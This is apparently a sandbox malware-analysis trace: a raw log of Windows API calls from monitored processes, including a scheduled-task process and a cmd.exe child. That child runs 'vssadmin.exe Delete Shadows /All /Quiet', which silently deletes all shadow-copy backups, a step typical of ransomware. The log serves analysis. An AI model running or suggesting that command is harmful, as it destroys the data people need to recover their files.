[0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365398) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365398) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364e50) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364e50) returned 0x10 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3654d8) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3654d8) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364c58) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364c58) returned 0x10 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3650a0) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3650a0) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3650c0) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3650c0) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3650e0) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3650e0) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365100) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365100) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364c70) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364c70) returned 0x10 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365120) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365120) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365198) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365198) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3651d8) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3651d8) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365218) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.092] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365218) returned 0x14 [0029.092] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365238) returned 1 [0029.092] GetProcessHeap () returned 0x350000 [0029.093] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365238) returned 0x14 [0029.093] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364c88) returned 1 [0029.093] GetProcessHeap () returned 0x350000 [0029.093] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364c88) returned 0x10 [0029.093] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3651b8) returned 1 [0029.093] GetProcessHeap () returned 0x350000 [0029.093] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3651b8) returned 0x14 [0029.093] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364c40) returned 1 [0029.093] GetProcessHeap () returned 0x350000 [0029.093] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364c40) returned 0x10 [0029.093] exit (_Code=0) Thread: id = 4 os_tid = 0x7e0 Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x7a9ca000" os_pid = "0x530" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {DAD14AF5-82A5-4514-AFD0-06330000279A} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0x230 Thread: id = 6 os_tid = 0x5b8 Thread: id = 7 os_tid = 0x598 Thread: id = 8 os_tid = 0x548 Thread: id = 9 os_tid = 0x53c Thread: id = 10 os_tid = 0x534 Thread: id = 69 os_tid = 0xbfc Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1b281000" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\system32\\cmd.exe /C title 3382479|vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0xb50 [0046.193] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afeb0 | out: lpSystemTimeAsFileTime=0x1afeb0*(dwLowDateTime=0x1a6bd2e0, dwHighDateTime=0x1d5e3d9)) [0046.193] GetCurrentProcessId () returned 0xb4c [0046.193] GetCurrentThreadId () returned 0xb50 [0046.193] GetTickCount () returned 0x11564eb [0046.193] QueryPerformanceCounter (in: lpPerformanceCount=0x1afeb8 | out: lpPerformanceCount=0x1afeb8*=18811527428) returned 1 [0046.194] GetModuleHandleW (lpModuleName=0x0) returned 0x49eb0000 [0046.194] __set_app_type (_Type=0x1) [0046.194] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ed7810) returned 0x0 [0046.194] __getmainargs (in: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610, _DoWildCard=0, _StartInfo=0x49ede0f4 | out: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610) returned 0 [0046.194] GetCurrentThreadId () returned 0xb50 [0046.194] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb50) returned 0x3c [0046.194] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.194] GetProcAddress (hModule=0x76f20000, lpProcName="SetThreadUILanguage") returned 0x76f36d40 [0046.194] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.195] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afe48 | out: phkResult=0x1afe48*=0x0) returned 0x2 [0046.195] VirtualQuery (in: lpAddress=0x1afe30, lpBuffer=0x1afdb0, dwLength=0x30 | out: lpBuffer=0x1afdb0*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.195] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afdb0, dwLength=0x30 | out: lpBuffer=0x1afdb0*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.195] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afdb0, dwLength=0x30 | out: lpBuffer=0x1afdb0*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.195] VirtualQuery (in: lpAddress=0xb4000, lpBuffer=0x1afdb0, dwLength=0x30 | out: lpBuffer=0x1afdb0*(BaseAddress=0xb4000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.195] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afdb0, dwLength=0x30 | out: lpBuffer=0x1afdb0*(BaseAddress=0x1b0000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0046.195] GetConsoleOutputCP () returned 0x1b5 [0046.195] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.195] SetConsoleCtrlHandler (HandlerRoutine=0x49ed3184, Add=1) returned 1 [0046.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.196] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0046.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 1 [0046.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.196] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0046.196] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.196] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.196] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.196] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0046.197] GetEnvironmentStringsW () returned 0x1d8b40* [0046.197] GetProcessHeap () returned 0x1c0000 [0046.197] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xa7c) returned 0x1d95d0 [0046.197] FreeEnvironmentStringsW (penv=0x1d8b40) returned 1 [0046.197] GetProcessHeap () returned 0x1c0000 [0046.197] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x8) returned 0x1d89c0 [0046.197] GetEnvironmentStringsW () returned 0x1d8b40* [0046.197] GetProcessHeap () returned 0x1c0000 [0046.197] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xa7c) returned 0x1da060 [0046.197] FreeEnvironmentStringsW (penv=0x1d8b40) returned 1 [0046.197] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aed08 | out: phkResult=0x1aed08*=0x44) returned 0x0 [0046.197] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x0, lpData=0x1aed20*=0x18, lpcbData=0x1aed04*=0x1000) returned 0x2 [0046.197] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x1, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.197] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x0, lpData=0x1aed20*=0x1, lpcbData=0x1aed04*=0x1000) returned 0x2 [0046.197] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x0, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.197] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x40, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.197] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x40, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.197] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x0, lpData=0x1aed20*=0x40, lpcbData=0x1aed04*=0x1000) returned 0x2 [0046.198] RegCloseKey (hKey=0x44) returned 0x0 [0046.198] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aed08 | out: phkResult=0x1aed08*=0x44) returned 0x0 [0046.198] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x0, lpData=0x1aed20*=0x40, lpcbData=0x1aed04*=0x1000) returned 0x2 [0046.198] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x1, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.198] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x0, lpData=0x1aed20*=0x1, lpcbData=0x1aed04*=0x1000) returned 0x2 [0046.198] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x0, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.198] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x9, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.198] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x4, lpData=0x1aed20*=0x9, lpcbData=0x1aed04*=0x4) returned 0x0 [0046.198] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aed00, lpData=0x1aed20, lpcbData=0x1aed04*=0x1000 | out: lpType=0x1aed00*=0x0, lpData=0x1aed20*=0x9, lpcbData=0x1aed04*=0x1000) returned 0x2 [0046.198] RegCloseKey (hKey=0x44) returned 0x0 [0046.198] time (in: timer=0x0 | out: timer=0x0) returned 0x5e47aa56 [0046.198] srand (_Seed=0x5e47aa56) [0046.198] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 3382479|vssadmin.exe Delete Shadows /All /Quiet" [0046.198] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 3382479|vssadmin.exe Delete Shadows /All /Quiet" [0046.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.198] GetProcessHeap () returned 0x1c0000 [0046.198] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x218) returned 0x1daaf0 [0046.199] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1dab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.199] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.199] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.199] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.199] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0046.199] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0046.199] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0046.199] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0046.199] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0046.199] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0046.199] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0046.199] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0046.199] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0046.199] GetProcessHeap () returned 0x1c0000 [0046.199] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1d95d0 | out: hHeap=0x1c0000) returned 1 [0046.199] GetEnvironmentStringsW () returned 0x1d8b40* [0046.199] GetProcessHeap () returned 0x1c0000 [0046.199] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xa94) returned 0x1dad10 [0046.199] FreeEnvironmentStringsW (penv=0x1d8b40) returned 1 [0046.199] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.199] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.199] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.199] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.199] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.199] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.199] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.199] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.200] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.200] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.200] GetProcessHeap () returned 0x1c0000 [0046.200] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x5c) returned 0x1db7b0 [0046.200] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afb10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1afb10, lpFilePart=0x1afaf0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1afaf0*="Desktop") returned 0x25 [0046.200] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.200] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af820 | out: lpFindFileData=0x1af820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x1db820 [0046.200] FindClose (in: hFindFile=0x1db820 | out: hFindFile=0x1db820) returned 1 [0046.200] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1af820 | out: lpFindFileData=0x1af820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x1db820 [0046.200] FindClose (in: hFindFile=0x1db820 | out: hFindFile=0x1db820) returned 1 [0046.200] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.200] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1af820 | out: lpFindFileData=0x1af820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x13408ec0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x1db820 [0046.200] FindClose (in: hFindFile=0x1db820 | out: hFindFile=0x1db820) returned 1 [0046.200] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.200] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.200] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.201] GetProcessHeap () returned 0x1c0000 [0046.201] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dad10 | out: hHeap=0x1c0000) returned 1 [0046.201] GetEnvironmentStringsW () returned 0x1db820* [0046.201] GetProcessHeap () returned 0x1c0000 [0046.201] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xae8) returned 0x1dc310 [0046.201] FreeEnvironmentStringsW (penv=0x1db820) returned 1 [0046.201] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.201] GetProcessHeap () returned 0x1c0000 [0046.201] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1db7b0 | out: hHeap=0x1c0000) returned 1 [0046.201] GetProcessHeap () returned 0x1c0000 [0046.201] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x4016) returned 0x1dce00 [0046.201] GetProcessHeap () returned 0x1c0000 [0046.201] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x80) returned 0x1d9630 [0046.201] GetProcessHeap () returned 0x1c0000 [0046.201] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dce00 | out: hHeap=0x1c0000) returned 1 [0046.201] GetConsoleOutputCP () returned 0x1b5 [0046.201] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.201] GetUserDefaultLCID () returned 0x409 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ee7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afc20, cchData=128 | out: lpLCData="0") returned 2 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afc20, cchData=128 | out: lpLCData="0") returned 2 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afc20, cchData=128 | out: lpLCData="1") returned 2 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49efa740, cchData=8 | out: lpLCData="/") returned 2 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49efa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49efa460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49efa420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49efa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49efa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49efa360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49efa700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ee7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.202] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49efa4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.203] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.203] GetProcessHeap () returned 0x1c0000 [0046.203] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x20c) returned 0x1d9730 [0046.203] GetConsoleTitleW (in: lpConsoleTitle=0x1d9730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.203] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.203] GetProcAddress (hModule=0x76f20000, lpProcName="CopyFileExW") returned 0x76f323d0 [0046.204] GetProcAddress (hModule=0x76f20000, lpProcName="IsDebuggerPresent") returned 0x76f28290 [0046.204] GetProcAddress (hModule=0x76f20000, lpProcName="SetConsoleInputExeNameW") returned 0x76f317e0 [0046.204] GetProcessHeap () returned 0x1c0000 [0046.204] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x4012) returned 0x1dce00 [0046.204] GetProcessHeap () returned 0x1c0000 [0046.204] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dce00 | out: hHeap=0x1c0000) returned 1 [0046.204] _wcsicmp (_String1="title", _String2=")") returned 75 [0046.204] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0046.204] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0046.204] _wcsicmp (_String1="IF", _String2="title") returned -11 [0046.204] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0046.204] _wcsicmp (_String1="REM", _String2="title") returned -2 [0046.204] _wcsicmp (_String1="REM/?", 